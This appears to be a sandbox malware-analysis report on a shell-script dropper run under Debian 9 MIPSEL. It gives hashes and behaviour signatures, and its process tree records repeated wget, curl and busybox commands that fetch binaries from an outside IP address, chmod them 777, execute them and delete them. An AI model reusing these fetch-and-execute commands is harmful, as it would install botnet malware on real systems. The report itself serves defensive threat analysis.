Analysis
-
max time kernel
74s -
max time network
75s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/10/2024, 01:20
Static task
static1
Behavioral task
behavioral1
Sample
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
-
Size
10KB
-
MD5
f79898139a1b167722dc600e9d8751bd
-
SHA1
c722cddfe77235ab1217ff62e01181953ff08a24
-
SHA256
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e
-
SHA512
99640786d2cad89e6932b07b8415be47959e635c05d46f6a9296711a1ba314dac17263a2d108e0af8a7ac270981f81c2065ac6f5cf718e3e5b9cff0d96e70137
-
SSDEEP
192:w/fwLnbwfOiNa6QAP8AnDlksBw8S8AnkksBw8t/fwLnAOiNa6I:zwOAP8AnDlksBw8S8AnkksBw8q
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 732 chmod 932 chmod 962 chmod 793 chmod 896 chmod 746 chmod 845 chmod 908 chmod 950 chmod 968 chmod 974 chmod 839 chmod 866 chmod 884 chmod 920 chmod 944 chmod 740 chmod 956 chmod 851 chmod 872 chmod 914 chmod 938 chmod 830 chmod 890 chmod 857 chmod 878 chmod 902 chmod 926 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE 734 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ 741 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K 747 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 794 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce 832 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl 840 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ 846 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 852 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa 858 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI 867 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 873 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr 879 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs 885 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 891 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 897 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa 903 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI 909 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ 915 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr 921 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs 927 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 933 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 939 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ 945 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K 951 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE 957 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce 963 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl 969 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 975 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI curl File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE curl File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ curl File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ curl File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa curl File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr curl File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 curl File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl curl File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K curl File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 curl File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa curl File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce curl File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl curl File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 curl File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 curl File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 curl File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 curl File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs curl File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ curl File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 curl File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 curl File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ curl File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce curl File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE curl File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI curl File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K curl File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr curl File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs curl
Processes
-
/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:704
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:707
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:718
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:730
-
-
/bin/chmodchmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:735
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:736
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:739
-
-
/bin/chmodchmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:745
-
-
/bin/chmodchmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:748
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:749
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:757
-
-
/bin/chmodchmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:797
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:798
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:827
-
-
/bin/chmodchmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:835
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:836
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:838
-
-
/bin/chmodchmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:841
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:842
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:844
-
-
/bin/chmodchmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:847
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:848
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:850
-
-
/bin/chmodchmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:853
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:854
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:856
-
-
/bin/chmodchmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:859
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:860
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:862
-
-
/bin/chmodchmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:869
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:871
-
-
/bin/chmodchmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:877
-
-
/bin/chmodchmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:883
-
-
/bin/chmodchmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:889
-
-
/bin/chmodchmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:895
-
-
/bin/chmodchmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:901
-
-
/bin/chmodchmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:907
-
-
/bin/chmodchmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:913
-
-
/bin/chmodchmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:919
-
-
/bin/chmodchmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:925
-
-
/bin/chmodchmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:929
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:931
-
-
/bin/chmodchmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:934
-
-
